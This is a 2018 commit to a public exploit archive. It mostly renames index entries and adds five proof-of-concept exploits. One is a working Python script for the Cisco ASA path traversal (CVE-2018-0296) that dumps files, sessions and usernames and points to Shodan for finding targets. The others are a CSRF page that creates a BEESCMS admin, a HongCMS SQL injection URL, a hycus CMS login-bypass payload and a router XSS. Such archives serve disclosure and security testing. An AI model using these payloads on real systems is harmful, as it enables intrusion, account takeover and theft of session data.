DB: 2018-06-29

5 changes to exploits/shellcodes

Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)

freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)

freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)

Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One
Novell Groupwise 8.0 - 'RCPT' Off-by-One

WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service
WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service

Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities
Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities
Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution
Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution
Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution
Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution

Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities
Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities

LiteServe 2.81 - PASV Command Denial of Service
LiteServe 2.81 - 'PASV' Denial of Service

Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)
Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC)

TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities
TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities

WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service
WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service

WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service
WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service

Oracle 8i - dbsnmp Command Remote Denial of Service
Oracle 8i - 'dbsnmp' Remote Denial of Service

Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow
Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow

GuildFTPd 0.999.8 - CWD Command Denial of Service
GuildFTPd 0.999.8 - 'CWD' Denial of Service

Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow
Xlight FTP Server 1.25/1.41 - 'PASS'  Remote Buffer Overflow

RobotFTP Server 1.0/2.0 - Remote Command Denial of Service
RobotFTP Server 1.0/2.0 - Remote Denial of Service
RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)
RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)
RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)
RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1)
RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2)
RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3)

Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution
Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution

MailEnable 1.x - SMTP HELO Command Remote Denial of Service
MailEnable 1.x - SMTP 'HELO' Remote Denial of Service

HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow
HP Printer FTP Print Server 2.4.5 - 'LIST'  Buffer Overflow

HP JetDirect FTP Print Server - RERT Command Denial of Service
HP JetDirect FTP Print Server - 'RERT' Denial of Service

FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow
FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow

freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service

Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service
Qbik WinGate 6.2.2 - 'LIST'  Remote Denial of Service

Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow
Quick 'n Easy FTP Server 3.9.1 - 'USER'  Remote Buffer Overflow
Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service
Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service
Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service
Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service

Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution
Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution

Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution
Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution

Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction
Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution

Golden FTP Server 4.70 - PASS Command Buffer Overflow
Golden FTP Server 4.70 - 'PASS'  Buffer Overflow

EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit)

Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)
Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit)

EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - 'LIST'  Stack Buffer Overflow (Metasploit)

EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit)

HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)

Zabbix Agent - net.tcp.listen Command Injection (Metasploit)
Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit)

Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)
Actfax FTP Server 4.27 - 'USER'  Stack Buffer Overflow (Metasploit)
HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)
HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)
HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1)
HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2)

Majordomo 1.89/1.90 - lists Command Execution
Majordomo 1.89/1.90 - 'lists' Command Execution

PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution
PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution

SGI IRIX 6.x - rpc.xfsmd Remote Command Execution
SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution

HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure
HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure

Sami FTP Server 2.0.1 - LIST Command Buffer Overflow
Sami FTP Server 2.0.1 - 'LIST'  Buffer Overflow

Sami FTP Server - LIST Command Buffer Overflow (Metasploit)
Sami FTP Server - 'LIST'  Buffer Overflow (Metasploit)

PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)
PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit)

FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow
FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow

HP Data Protector - EXEC_BAR Remote Command Execution
HP Data Protector - 'EXEC_BAR' Remote Command Execution

IPtools 0.1.4 - Remote Command Server Buffer Overflow
IPtools 0.1.4 - Remote Buffer Overflow

TWiki 20030201 - search.pm Remote Command Execution
TWiki 20030201 - 'search.pm' Remote Command Execution
AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)
AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)

Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution
Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution

SimpleBBS 1.1 - Remote Commands Execution
SimpleBBS 1.1 - Remote Command Execution

SimpleBBS 1.1 - Remote Commands Execution (C)
SimpleBBS 1.1 - Remote Command Execution (C)

Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution
Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution
phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command
phpDocumentor 1.3.0 rc4 - Remote Commands Execution
phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command
phpDocumentor 1.3.0 rc4 - Remote Command Execution
CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution
SPIP 1.8.2g - Remote Commands Execution
CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution
SPIP 1.8.2g - Remote Command Execution

DocMGR 0.54.2 - 'file_exists' Remote Commands Execution
DocMGR 0.54.2 - 'file_exists' Remote Command Execution
EnterpriseGS 1.0 rc4 - Remote Commands Execution
FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution
EnterpriseGS 1.0 rc4 - Remote Command Execution
FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution

PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution
PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution

Coppermine Photo Gallery 1.4.3 - Remote Commands Execution
Coppermine Photo Gallery 1.4.3 - Remote Command Execution

GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution
GeekLog 1.x - 'error.log' Remote Command Execution

PHP-Stats 0.1.9.1 - Remote Commands Execution
PHP-Stats 0.1.9.1 - Remote Commans Execution

Gallery 2.0.3 - stepOrder[] Remote Commands Execution
Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution

phpList 2.10.2 - GLOBALS[] Remote Code Execution
phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution

Simplog 0.9.2 - 's' Remote Commands Execution
Simplog 0.9.2 - 's' Remote Command Execution

phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution
phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution

phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution
phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution

GuppY 4.5.16 - Remote Commands Execution
GuppY 4.5.16 - Remote Command Execution

AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)
AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit)

Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution
Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution

SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution
SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution
BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin)
HongCMS 3.0.0 - SQL Injection
hycus CMS 1.0.4 - Authentication Bypass
DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
Cisco Adaptive Security Appliance - Path Traversal
This commit is contained in:
Offensive Security 2018-06-29 05:01:52 +00:00
parent 641d6cca75
commit fdf8bfe785
6 changed files with 269 additions and 82 deletions

View file

@ -0,0 +1,18 @@
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
# Date: 2018-06-25
# Vendor Homepage:  http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
# Category: Hardware
# Exploit Author: Adipta Basu
# Tested on: Mac OS High Sierra
# CVE: N/A
 
# Reproduction Steps:
 
   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
   - Open BurpSuite
- Change the SSID to "Testing" and hit "Apply"
- Burp will capture the intercepts.
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
- Refresh the page, and you will get the "ADIPTA" pop-up

View file

@ -0,0 +1,107 @@
'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
import re
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
''' Extraccion de usuarios'''
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group()+"\n")
''' Fin Extraccion de usuarios'''
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)

View file

@ -0,0 +1,31 @@
# Exploit Title: A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
# Date: 2018-06-25
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9226389.html
# Software Link: http://www.beescms.com/
# Version: BEESCMS - V4.0
# CVE : CVE-2018-12739
A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
The payload for attack is as follows.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
<input type="hidden" name="admin_name" value="test1" />
<input type="hidden" name="admin_password" value="test1" />
<input type="hidden" name="admin_password2" value="test1" />
<input type="hidden" name="admin_nich" value="test1" />
<input type="hidden" name="purview" value="1" />
<input type="hidden" name="admin_admin" value="" />
<input type="hidden" name="admin_mail" value="" />
<input type="hidden" name="admin_tel" value="" />
<input type="hidden" name="is_disable" value="0" />
<input type="hidden" name="action" value="save_admin" />
<input type="hidden" name="submit" value="确定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

View file

@ -0,0 +1,13 @@
# Exploit Title: HongCMS 3.0.0 - SQL Injection
# Google Dork: [if applicable]
# Date: 2018/06/26
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/Neeke/HongCMS/
# Software Link: https://github.com/Neeke/HongCMS/
# Version: 3.0.0
# Tested on: php5.4 mysql5
# CVE : CVE-2018-12912
POC (Administrator Privilege):
/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

View file

@ -0,0 +1,13 @@
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A
#Proof Of Concept
use login bypass payload for username= '=' 'OR' for password= '=' 'OR'

View file

@ -791,7 +791,7 @@ id,file,description,date,author,type,platform,port
6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows,
6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows,
6459,exploits/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,dos,hardware,
6463,exploits/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",dos,windows,
6463,exploits/windows/dos/6463.rb,"Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",dos,windows,
6471,exploits/multiple/dos/6471.pl,"Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,dos,multiple,
6472,exploits/multiple/dos/6472.c,"Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",dos,multiple,
6474,exploits/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",dos,windows,
@ -838,9 +838,9 @@ id,file,description,date,author,type,platform,port
6756,exploits/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",dos,windows,
6761,exploits/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",dos,windows,
6775,exploits/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",dos,solaris,
6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
6805,exploits/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",dos,multiple,
6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
6815,exploits/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",dos,windows,
6824,exploits/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",dos,windows,
6832,exploits/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,dos,windows,
@ -936,7 +936,7 @@ id,file,description,date,author,type,platform,port
7942,exploits/windows/dos/7942.pl,"Elecard AVC HD player - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,dos,windows,
7943,exploits/windows/dos/7943.py,"RealVNC 4.1.2 - 'vncviewer.exe' RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",dos,windows,
7962,exploits/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,dos,windows,
7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One",2009-02-04,"Praveen Darshanam",dos,windows,
7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - 'RCPT' Off-by-One",2009-02-04,"Praveen Darshanam",dos,windows,
7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows,
7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows,
7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows,
@ -1193,7 +1193,7 @@ id,file,description,date,author,type,platform,port
9617,exploits/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",dos,windows,
9620,exploits/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,dos,windows,
9621,exploits/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",dos,windows,
9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service",2009-09-10,corelanc0d3r,dos,windows,
9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service",2009-09-10,corelanc0d3r,dos,windows,
9626,exploits/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,dos,windows,
9642,exploits/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",dos,multiple,1812
9646,exploits/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,dos,hardware,
@ -1603,7 +1603,7 @@ id,file,description,date,author,type,platform,port
13921,exploits/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",dos,windows,
13934,exploits/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,dos,windows,
13939,exploits/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,dos,windows,
13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows,
13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows,
13959,exploits/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",dos,windows,9987
13965,exploits/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)",2010-06-22,blake,dos,windows,
14003,exploits/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Denial of Service",2010-06-23,"Patroklos Argyroudis",dos,freebsd,
@ -1802,8 +1802,8 @@ id,file,description,date,author,type,platform,port
15494,exploits/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,dos,windows,
15495,exploits/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,dos,windows,
15458,exploits/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,dos,windows,
15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
15467,exploits/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",dos,multiple,
15474,exploits/multiple/dos/15474.txt,"IBM OmniFind - Buffer Overflow",2010-11-09,"Fatih Kilic",dos,multiple,
15476,exploits/multiple/dos/15476.php,"IBM OmniFind Crawler - Denial of Service",2010-11-09,"Fatih Kilic",dos,multiple,
@ -1843,7 +1843,7 @@ id,file,description,date,author,type,platform,port
15803,exploits/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",dos,windows,
15738,exploits/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows,
15739,exploits/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows,
15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities",2010-12-16,modpr0be,dos,windows,
15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities",2010-12-16,modpr0be,dos,windows,
15758,exploits/windows_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",dos,windows_x86,
15767,exploits/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",dos,windows,
15786,exploits/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,dos,windows,
@ -2005,12 +2005,12 @@ id,file,description,date,author,type,platform,port
17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,
17618,exploits/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service",2011-08-05,"SecPod Research",dos,windows,
17620,exploits/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",dos,windows,
17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",dos,windows,
17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - 'PASV' Denial of Service",2011-08-08,"Craig Freyman",dos,windows,
